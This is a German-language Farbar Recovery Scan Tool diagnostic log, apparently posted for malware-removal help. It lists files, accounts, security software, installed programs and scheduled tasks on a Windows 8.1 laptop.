C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 
2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 
00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2016-03-30 14:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-30 14:03 - 2015-11-01 22:59 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-30 13:57 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-30 13:57 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-30 13:57 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-30 13:57 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-30 13:54 - 2013-10-24 13:02 - 00000000 __RDO C:\Users\Denny\SkyDrive 2016-03-30 13:52 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-30 13:47 - 2016-01-28 22:26 - 00000000 ____D C:\Users\Denny\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Comodo 2016-03-30 12:54 - 2013-09-09 15:29 - 00000000 ____D C:\Program Files (x86)\Google 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2014-12-24 23:20 - 00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 
18:20 - 2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:17 - 2014-05-16 21:31 - 00000000 ____D C:\temp 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 
00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe 
==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2016-03-30 14:04

==================== Ende von FRST.txt ============================

FRST-Addition
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-30 14:44:43)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated) Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer) Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated) Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated) Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated) Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated) Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated) Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated) Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated) Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated) Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated) Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated) Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG) clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) 
Hidden CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.) Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc) Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation) EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation) HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated) Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation) Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation) Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 
Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla) Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG) Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG) Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon) Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon) Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.) Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.) Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group) Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG) SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.) 
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-30 13:53 - 2016-03-30 13:53 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

